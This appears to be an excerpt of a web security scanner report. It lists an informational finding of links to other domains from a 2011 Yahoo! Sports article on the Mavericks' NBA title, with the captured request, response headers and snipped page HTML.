<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307855496.jpg?x=94&y=63&xc=1&yc=1&wc=180&hc=120&q=100&sig=fBEIDS2ocjb7Na3dci2q1w--" title="Dirk fires back at Mavs" alt="Dirk fires back at Mavs" width="94" height="63">
</a>
...[SNIP]...
tp://sports.yahoo.com/nba/news?slug=aw-wojnarowski_lebron_james_dwyane_wade_nba_finals_game6_061111&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="LeBron coughing it up?">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
http://sports.yahoo.com/mma/news?slug=ki-iole_ufc131_dos_santos_beats_carwin_061111&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Dos Santos dominates Carwin at UFC 131">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307852871.jpg?x=94&y=63&xc=1&yc=1&wc=220&hc=147&q=100&sig=pSs3IwCg5jz8cCv94n_7Qw--" title="Dos Santos dominates Carwin at UFC 131" alt="Dos Santos dominates Carwin at UFC 131" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mma/news?slug=ys-ufc131_shane_carwin_blog_060911&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Carwin's pre-fight blog">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307722364.gif?x=94&y=63&xc=1&yc=1&wc=220&hc=147&q=100&sig=WMd9OccAwMTzQnWUVZpv5g--" title="Carwin's pre-fight blog" alt="Carwin's pre-fight blog" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mma/news?slug=mmajunkie-Spike_TV_TUF_14&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="'TUF 14' to feature 32">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
s.yahoo.com/mma/blog/cagewriter/post/Stout-scores-possible-KO-of-Year-on-Edwards-at-U?urn=mma-wp3402&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Knockout of the year?">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/shutdown_corner/post/Former-Cowboys-linebacker-Godfrey-Myles-dies-at-?urn=nfl-wp2552&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Ex-Cowboys player Godfrey Myles dies">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/11/godfrey-ipad.jpg?x=94&y=63&xc=215&yc=1&wc=596&hc=400&q=100&sig=KiIps_4zc5vJdVb5T8ZL8g--" title="Ex-Cowboys player Godfrey Myles dies" alt="Ex-Cowboys player Godfrey Myles dies" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=pfw-20110609_lockout_limbo_redskins_report&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Redskins' QB questions">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307677853.jpg?x=94&y=63&xc=13&yc=1&wc=350&hc=235&q=100&sig=_7Ph44gxlCqLT7uQYXoBQg--" title="Redskins' QB questions" alt="Redskins' QB questions" width="94" height="63">
</a>
...[SNIP]...
<a href="http://rivals.yahoo.com/ncaaf/news?slug=rivals-1230071&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Who won '04 NCAA title?">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<div id="ad-579434" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"> <script type="text/javascript" src="http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853703487&transactionID=1307962853703487"> </script>
...[SNIP]...
<div id="ad-436894" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"> <script type="text/javascript" src="http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853703487&transactionID=1307962853703487"> </script>
...[SNIP]...
<a href="http://us.lrd.yahoo.com/_ylt=AmSBOZDJi1_b83sbwQdsGnfTjdIF/SIG=11h6afr8f/EXP=1309172453/**http%3A//www.mavsmoneyball.com/" ><img src="http://l.yimg.com/a/p/sp/editorial_image/af/afb7a05bacb4dc1f3b0ee9ea39f1efc2/nbadal.gif" alt="SB Nation" />Mavs Moneyball</a>
...[SNIP]...
<a href="http://us.lrd.yahoo.com/_ylt=AhiU6TnXGdlBQdWEdkk7WmLTjdIF/SIG=11n9f9h9o/EXP=1309172453/**http%3A//www.silverscreenandroll.com/" ><img src="http://l.yimg.com/a/p/sp/editorial_image/66/66ed4c090d435ded86878f05b9320df7/nbalal.jpg" alt="SB Nation" />Silver Screen and Roll</a>
...[SNIP]...
<a href="http://us.lrd.yahoo.com/_ylt=AhrhZzpfExye8OGFipTyZ.nTjdIF/SIG=11nie43lb/EXP=1309172453/**http%3A//www.peninsulaismightier.com/" ><img src="http://l.yimg.com/a/p/sp/editorial_image/d4/d4f4977a4af580e2188d0b9454605942/nbamia.jpg" alt="SB Nation" />Peninsula is Mightier</a>
...[SNIP]...
/blog/ball_dont_lie/post/Video-Emotional-Dirk-Nowitzki-runs-off-court-ri;_ylt=AmX2akW77R0QvvnE7cz5YQzTjdIF?urn=nba-wp4846" title="Video: Emotional Dirk Nowitzki runs off court right before Finals win"><img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307938675.jpg" class="thumb" /></a>
...[SNIP]...
<div class="thumb">
<img src="http://l.yimg.com/a/p/i/bcst/turnersports/18542/124828121.jpg" width="92px" height="69px" alt="Sunday's Top 5" />
    <a href="http://sports.yahoo.com/video/player/nba/25586922;_ylt=AtQ5bPhcFOJ9gNusHlFa_q_TjdIF" >
...[SNIP]...
<div class="thumb">
<img src="http://l.yimg.com/a/p/i/bcst/cbslocal/18565/124828263.jpg" width="92px" height="69px" alt="Mavs Fans Celebrate NBA Championship In Miami" />
    <a href="http://sports.yahoo.com/video/player/nba/25586963;_ylt=AgC_xkuebiDrnifhnDhCB6rTjdIF" >
...[SNIP]...
<div class="thumb">
<img src="http://l.yimg.com/a/p/i/bcst/turnersports/18542/124827592.jpg" width="92px" height="69px" alt="Dunk of the Night" />
    <a href="http://sports.yahoo.com/video/player/nba/25586790;_ylt=AuHNfLJeYcC4K55MmQ49fwDTjdIF" >
...[SNIP]...
<div id="ad-441055" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"> <script type="text/javascript" src="http://ads.nba.com/js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307962853703487&transactionID=1307962853703487"> </script>
...[SNIP]...
</a> <script type="text/javascript" src="http://amch.questionmarket.com/adsc/d692902/3/695561/randm.js"></script>
...[SNIP]...

<img src="http://ad.yieldmanager.com/pixel?id=117617&t=2" width="1" height="1" /><script language=javascript>
...[SNIP]...
</div>

<iframe src="http://data.nba.com/data/html/gdyn/gdyn_nba.html" width=1 height=2 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no style="display:block;height:0;"></iframe>
</div>
</div>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/video/dash-players/yep-player.r169686;js/video/dash-players/dash-players.r170778;js/video/dash-players/dash-players-init.r172129.js?m"></script>

<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/answers_badge_1.5.r143221;js/teamtracker.r143221.js?m"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128f3el5i(gid$SSzZZEwNdHHm3NorTdAdCwM8rcHW80317eUAB.4z,st$1307962853607094,v$1.0))&t=J-D"></noscript>
...[SNIP]...

18.207. http://sports.yahoo.com/nba/news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sports.yahoo.com
Path:	/nba/news

Issue detail

The page was loaded from a URL containing a query string:

http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311

The response contains the following links to other domains:

http://154875.r.msn.com/?ld=4vrRVPvf9AAf9cxUB01PAJXAiXtMQpAHSwNOdJEiRWUvkD9zc0K_qvshvT-FWpSr0-cl7DuTEfKDgYVVXR_9LztVyMj40yachGXvzRsAXTLrNEW4rWXrEhut0-rGS1Op2rT3NxrFx9o9nJ5fbbY7crJQIVuDHjZuLW5xHiBFtRKF8ksjP_40Qgi4SStT7LZGCprUWMee_c4G8Wcr2UWxJuHjmBZxg6F0_XfCd3Ng6llApoQFvbh4-n_RlZqLerOkp1dG5luFuuNmARoGiyZcEWUCia6CyCS8KCfHK_c-iBmPA1VAlMGIDKqiAyOvk-dTB7Ue6g6xAmY3M9pCiaG2bjFYqdLcdp3FoJYWZQA3rBsqoRFLAn6WWENAA
http://26594.r.msn.com/?ld=4vcIx65G7Wened1TPiUm8hji-vGFjTwBR8CI1QOF23IhkRJga6pjPpN_i5g92XS1IOMMRQEyG0ybJo6JF_iAU9WYJu2zEgIBP5C0fU1M3IfKRrbD4bt6KjagqmsySPhDKtLAcIwaBZeYHAp0rndfbn2PRmR8a0sy0lKiHF8q_FujGr4gFL50k3-_qU8dFTpycKKT1ebmbCxgO7huB90R1djggqeccn0LvhoziosLFpXjx2PwpPRb8BNBAM33BpaEpkxyPj7DEAk5Mqzx81LQ6j_apa6VRaGaYxH8EVYCDJMLk1VAlMs1yvIDlIYsRE96jQMfosaxAmY3M9yz8p-WfngshLSz0fm8FvO1m6MVWohIyaOQXnnttXicU
http://392327.r.msn.com/?ld=4v2CvxXrcid54ssO2V1VQNk9DKcqaziknhcNXgpuCsu5e6XFlObOF7nER8XgvR2tJKne_zBNB_KB_1L2hmYMJi9ZlKARKZM7gCuo9UBgdN97EJo73bO-_92yO9lSOZS2TqHWmKwng6ubvugAJ2uKSsTRq8KOcne2NE_0LBqnAeyAJCmfv24zvIcFz_NlW-Bb4ciT7RA0sSOX0K5iTuSCeGd_XG-TDHK5a_3GJqt-LS4rCMA4Ckhxkp4T7t_iADvgr-8IOAbfxQMH6hgzSZOpydVzVUCUyO4Wc6zRuzmG_zEjeKUM7TECZjcz0c9gai5630QsW0touxG2NfvFjkSW-baE5-yHAsYcw77A
http://ad.yieldmanager.com/pixel?id=94633&t=2
http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702
http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702
http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702
http://ads.nba.com/js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702
http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702
http://ads.yimg.com/a/a/ya/yahoo_sports8/yahoo!_fantasy_football11_smb_630x31.jpg
http://amch.questionmarket.com/adsc/d692902/3/695561/randm.js
http://bit.ly/lhnZPc
http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(1285ed9c4(gid$djY9_EwNdHHm3NorTdAdCwKBrcHW80317eUACLbV,st$1307962853651207,v$1.0))&t=J-D
http://d.yimg.com/a/p/sp/ap/5e/fullj.261e7f944cfd25545b56930f1a2c06f3/ap-201106081242457246066.jpg?x=94&y=63&xc=1&yc=1&wc=349&hc=233&q=100&sig=DQRWzZOA498_5jeJ8SOypQ--
http://d.yimg.com/a/p/sp/ap/99/fullj.8f741bf99581b1f598f4bbd0ccac4f13/ap-201105301352499683518.jpg?x=198&y=136&xc=44&yc=1&wc=353&hc=243&q=100&sig=E7mAhtCIVwOCNe2DzFMJTA--
http://d.yimg.com/a/p/sp/getty/74/fullj.be3dd8e493d12661a6c3c69da6bd27b7/be3dd8e493d12661a6c3c69da6bd27b7-getty-_dolphin.jpg?x=94&y=63&xc=1&yc=1&wc=660&hc=442&q=100&sig=SLg3JcDSSPtWv01t0JhaVw--
http://d.yimg.com/a/p/sp/getty/9f/fullj.f3465156c4a1d8a9bd40907a552f9ac1/f3465156c4a1d8a9bd40907a552f9ac1-getty-114832789mw134_dallas_maver.jpg?x=198&y=136&xc=11&yc=1&wc=640&hc=440&q=100&sig=4Wg8UWZyVI3MM3XRtxqJOA--
http://d.yimg.com/a/p/sp/getty/9f/fullj.f3465156c4a1d8a9bd40907a552f9ac1/f3465156c4a1d8a9bd40907a552f9ac1-getty-114832789mw134_dallas_maver.jpg?x=94&y=63&xc=3&yc=1&wc=656&hc=440&q=100&sig=attJqgVCcbWX5fJecGk9.A--
http://d.yimg.com/nl/yahoo%20sports/site/player.swf
http://data.nba.com/data/html/gdyn/gdyn_nba.html
http://digg.com/submit?phase=2&url=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&title=Perseverance+pays+off+for+Nowitzki%2C+Mavs&ts=1307962853
http://l.yimg.com/a/i/us/sp/ed/experts/wojnarowski.png
http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png
http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-print-logo.png
http://l.yimg.com/a/i/ww/news/2011/06/08/goalie.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=TlV8qtCIHSkJYCX8s7qSeg--
http://l.yimg.com/a/i/ww/news/2011/06/10/brady.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=6Px4mV9VHyfgCJ68lZsJXA--
http://l.yimg.com/a/i/ww/news/2011/06/10/d2.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=kZLWzEBuB5OIti.wD3qccQ--
http://l.yimg.com/a/i/ww/news/2011/06/10/goal.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=ljrQeiwcSj_mrmcVg4ATtg--
http://l.yimg.com/a/i/ww/news/2011/06/10/lebron-big.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=uIeKaizVW.RdorgryBe0Sg--
http://l.yimg.com/a/i/ww/news/2011/06/10/mavs.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=u5SPXj_CUd8f7TwwUIjXZQ--
http://l.yimg.com/a/i/ww/news/2011/06/10/tiger1.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=dIURv6ZGoyUZZmWzhyuzVg--
http://l.yimg.com/a/i/ww/news/2011/06/11/godfrey-ipad.jpg?x=94&y=63&xc=215&yc=1&wc=596&hc=400&q=100&sig=KiIps_4zc5vJdVb5T8ZL8g--
http://l.yimg.com/a/p/i/bcst/cbslocal/18565/124828263.jpg
http://l.yimg.com/a/p/i/bcst/turnersports/18542/124827592.jpg
http://l.yimg.com/a/p/i/bcst/turnersports/18542/124828121.jpg
http://l.yimg.com/a/p/sp/editorial_image/66/66ed4c090d435ded86878f05b9320df7/nbalal.jpg
http://l.yimg.com/a/p/sp/editorial_image/af/afb7a05bacb4dc1f3b0ee9ea39f1efc2/nbadal.gif
http://l.yimg.com/a/p/sp/editorial_image/d4/d4f4977a4af580e2188d0b9454605942/nbamia.jpg
http://l.yimg.com/a/p/sp/tools/med/2011/05/ipt/1306711597.jpg
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307677853.jpg?x=94&y=63&xc=13&yc=1&wc=350&hc=235&q=100&sig=_7Ph44gxlCqLT7uQYXoBQg--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307722364.gif?x=94&y=63&xc=1&yc=1&wc=220&hc=147&q=100&sig=WMd9OccAwMTzQnWUVZpv5g--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307852871.jpg?x=94&y=63&xc=1&yc=1&wc=220&hc=147&q=100&sig=pSs3IwCg5jz8cCv94n_7Qw--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307855496.jpg?x=94&y=63&xc=1&yc=1&wc=180&hc=120&q=100&sig=fBEIDS2ocjb7Na3dci2q1w--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307858429.jpg?x=94&y=63&xc=1&yc=1&wc=200&hc=134&q=100&sig=XyvTu0c9VsrVHGCR3997bA--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307937492.jpg?x=198&y=136&xc=1&yc=1&wc=220&hc=151&q=100&sig=TR.XYVYO4ZmKsIIgKwVMcQ--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307938675.jpg
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307947097.jpg?x=94&y=63&xc=1&yc=1&wc=180&hc=120&q=100&sig=Ec2FAhGBmbcGt5yb1E1q7A--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307948894.jpg?x=94&y=63&xc=43&yc=1&wc=326&hc=219&q=100&sig=Xvl4l0f_TVE.F1uSsI4ZHw--
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307955445.jpg
http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307955591.jpg
http://l.yimg.com/j/assets/css/video/dash-players/ysp-dash-players.r172932.css?m
http://l.yimg.com/j/assets/eJx1UtluwyAQ_KLEHAZs9WMQxpsYxWYtINffF4PTJpX6BMzMHrOLjbF5Xl0TIEI6nNCneDgHN0bNjvRIjoG2nDH6ZbPO4rKgbwYTIeNCCaEKHlcMKW5QL4QsEDxWqNhv-DqbJwQdwQQ7ZUbxlvU1gcUAaXL-Q29CcnbeSinGePfeQkKcBxMyJQXl_J3aDvB_St_cCFgSvdR7Mx4TlM4V4W0hnEW_IZLKPfinu5dzxWQvKlW8aBOji6lZnHf1qhkhPekYoZJ3W3opKSsRJzDpGmDUw4znUidzH95GF-2MMYu2wJZ2dUarsxdYNIwuYdDbq0SrVu0zdAnu2ab25qYnMGN2d8JsL9RR7_b2Is-4HhYcX2eRMMn-kwz4KFPYdfva0Toz6-GaUh2Z6GRL_0thJ7CXsmEpGalLuKMpH4H0nH4DlFncJQ,,.css?z&m
http://l.yimg.com/j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js?z&m
http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/answers_badge_1.5.r143221;js/teamtracker.r143221.js?m
http://l.yimg.com/j/assets/js/video/dash-players/yep-player.r169686;js/video/dash-players/dash-players.r170778;js/video/dash-players/dash-players-init.r172129.js?m
http://l.yimg.com/j/assets/print_css/article.r158641.css?m
http://l.yimg.com/zz/combo?kx/ucs/uh/css/205/yunivhead-min.css&kx/ucs/uh/css/194/logo-min.css&kx/ucs/search/css/163/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css
http://twitter.com/WojYahooNBA
http://twitter.com/home?status=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
http://www.facebook.com/sharer.php?u=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&title=Perseverance+pays+off+for+Nowitzki%2C+Mavs&ts=1307962853
http://yahoosports.teamfanshop.com/NBA_Basketball
http://yhoo.it/j7vXPD
http://yhoo.it/jSvQmx
http://yhoo.it/mAVQQC

Request

GET /nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=dallas+mavericks&date=2011-6-13&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:00:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Via: HTTP/1.1 r5.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 142096

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Perseverance pays off for Nowitzki, Mavs - NBA - Yahoo! Sports</title>
<meta http-e
...[SNIP]...
<meta name="description" content="While LeBron James wallows in failure, Dirk Nowitzki is rewarded for being the consummate blue-collar employee. - National Basketball Association news"/>
<link type="text/css" rel="stylesheet" media="screen" href="http://l.yimg.com/j/assets/eJx1UtluwyAQ_KLEHAZs9WMQxpsYxWYtINffF4PTJpX6BMzMHrOLjbF5Xl0TIEI6nNCneDgHN0bNjvRIjoG2nDH6ZbPO4rKgbwYTIeNCCaEKHlcMKW5QL4QsEDxWqNhv-DqbJwQdwQQ7ZUbxlvU1gcUAaXL-Q29CcnbeSinGePfeQkKcBxMyJQXl_J3aDvB_St_cCFgSvdR7Mx4TlM4V4W0hnEW_IZLKPfinu5dzxWQvKlW8aBOji6lZnHf1qhkhPekYoZJ3W3opKSsRJzDpGmDUw4znUidzH95GF-2MMYu2wJZ2dUarsxdYNIwuYdDbq0SrVu0zdAnu2ab25qYnMGN2d8JsL9RR7_b2Is-4HhYcX2eRMMn-kwz4KFPYdfva0Toz6-GaUh2Z6GRL_0thJ7CXsmEpGalLuKMpH4H0nH4DlFncJQ,,.css?z&m" />
<link type="text/css" rel="stylesheet" media="print" href="http://l.yimg.com/j/assets/print_css/article.r158641.css?m" />

<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js?z&m"></script>
...[SNIP]...
<meta property="og:title" content="Perseverance pays off for Nowitzki, Mavs" />
<link rel="image_src" href="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307955445.jpg" />
<link rel="canonical" href="http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311" />
...[SNIP]...
<meta name="msapplication-task" content="name=Photos;action-uri=http://sports.yahoo.com/nba/gallery;icon-uri=http://sports.yahoo.com/favicon.ico" />
<link rel="stylesheet" type="text/css" media="screen" href="http://l.yimg.com/j/assets/css/video/dash-players/ysp-dash-players.r172932.css?m" />

<STYLE>
...[SNIP]...
<h2 id="yahoo-image-logo"><img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-print-logo.png" alt="Yahoo! Sports" /></h2>
...[SNIP]...
<div id="ysp-hd">

<link type='text/css' rel='stylesheet' href='http://l.yimg.com/zz/combo?kx/ucs/uh/css/205/yunivhead-min.css&kx/ucs/uh/css/194/logo-min.css&kx/ucs/search/css/163/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css'/><style>
...[SNIP]...
<div id="ad-362051" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"><script type="text/javascript" src="http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702"></script>
...[SNIP]...
<div class="hd">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/05/ipt/1306711597.jpg" />

<h1 property="dc:title">
...[SNIP]...
<div class="byline">
<img src="http://l.yimg.com/a/i/us/sp/ed/experts/wojnarowski.png" alt="Adrian Wojnarowski" />
<div rel="dc:creator">
...[SNIP]...
<param name="flashVars" value="vid=25587086"><embed width="576" height="324" allowfullscreen="true" src="http://d.yimg.com/nl/yahoo%20sports/site/player.swf" type="application/x-shockwave-flash" flashvars="vid=25587086"></object>
...[SNIP]...
<li class="B"><a href="http://yhoo.it/mAVQQC" >Wetzel: LeBron's failure warms Cleveland's heart</a>
...[SNIP]...
<li class="B"><a href="http://yahoosports.teamfanshop.com/NBA_Basketball" target="_new">Buy championship gear</a>
...[SNIP]...
<div id="ad-862421" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"> <script type="text/javascript" src="http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702"> </script>
...[SNIP]...
<div class="inline_photo inline_photo_right" style="width: 180px">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307955445.jpg"/> <div class="caption">
...[SNIP]...
<div class="inline_photo inline_photo_right" style="width: 325px">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307955591.jpg"/> <div class="caption">
...[SNIP]...
<br />
• <a href="http://yhoo.it/j7vXPD">Twins’ Francisco Liriano loses no-no after long wait</a><br />
• <a href="http://yhoo.it/jSvQmx">Jeff Gordon notches historic win at Pocono</a>
...[SNIP]...
<br />
• <a href="http://bit.ly/lhnZPc">Pete Carroll scolds NCAA for penalizing current USC players</a>
...[SNIP]...
<div class="author">Adrian Wojnarowski is the NBA columnist for Yahoo! Sports. <a href="http://twitter.com/WojYahooNBA" target="new">Follow him on Twitter</a>
...[SNIP]...

<a href="http://digg.com/submit?phase=2&url=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&title=Perseverance+pays+off+for+Nowitzki%2C+Mavs&ts=1307962853" class="digg" title="Digg.com" target="_new">digg</a>
...[SNIP]...

<a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&title=Perseverance+pays+off+for+Nowitzki%2C+Mavs&ts=1307962853" class="facebook" title="Facebook" target="_new">add to facebook</a>
...[SNIP]...

<a href="http://twitter.com/home?status=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311" class="twitter" title="Twitter" target="_new">Twitter</a>
...[SNIP]...
<div class="super-thumb">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307937492.jpg?x=198&y=136&xc=1&yc=1&wc=220&hc=151&q=100&sig=TR.XYVYO4ZmKsIIgKwVMcQ--" title="Mavericks win first NBA title, oust Heat" alt="Mavericks win first NBA title, oust Heat" class="thumb-img" width="198" height="136">
<span class="text-bars">
...[SNIP]...
<div class="super-thumb">
<img src="http://d.yimg.com/a/p/sp/ap/99/fullj.8f741bf99581b1f598f4bbd0ccac4f13/ap-201105301352499683518.jpg?x=198&y=136&xc=44&yc=1&wc=353&hc=243&q=100&sig=E7mAhtCIVwOCNe2DzFMJTA--" title="1 win from title, Mavs not excited yet" alt="1 win from title, Mavs not excited yet" class="thumb-img" width="198" height="136">
<span class="text-bars">
...[SNIP]...
<div class="super-thumb">
